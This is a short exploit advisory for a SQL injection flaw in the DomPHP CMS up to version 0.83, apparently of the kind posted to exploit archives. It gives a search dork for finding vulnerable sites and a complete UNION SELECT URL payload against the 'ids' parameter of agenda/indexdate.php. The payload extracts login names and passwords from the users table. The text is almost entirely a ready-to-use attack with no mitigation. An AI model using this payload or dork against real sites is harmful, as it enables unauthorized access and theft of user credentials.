-------------------------------------------------------------
DomPHP <= v0.83 SQL Injection Vulnerability
-------------------------------------------------------------
= Author : Houssamix
= Script : DomPHP <= v0.83
= Download : http://www.domphp.com/download/
= BUG : SQL Injection Vulnerability
= DORK : Site cr ? l'aide du CMS DomPHP v0.83
= Exploit :
http://[target]/agenda/indexdate.php?ids=77 [SQL]
Exemple :
http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs--
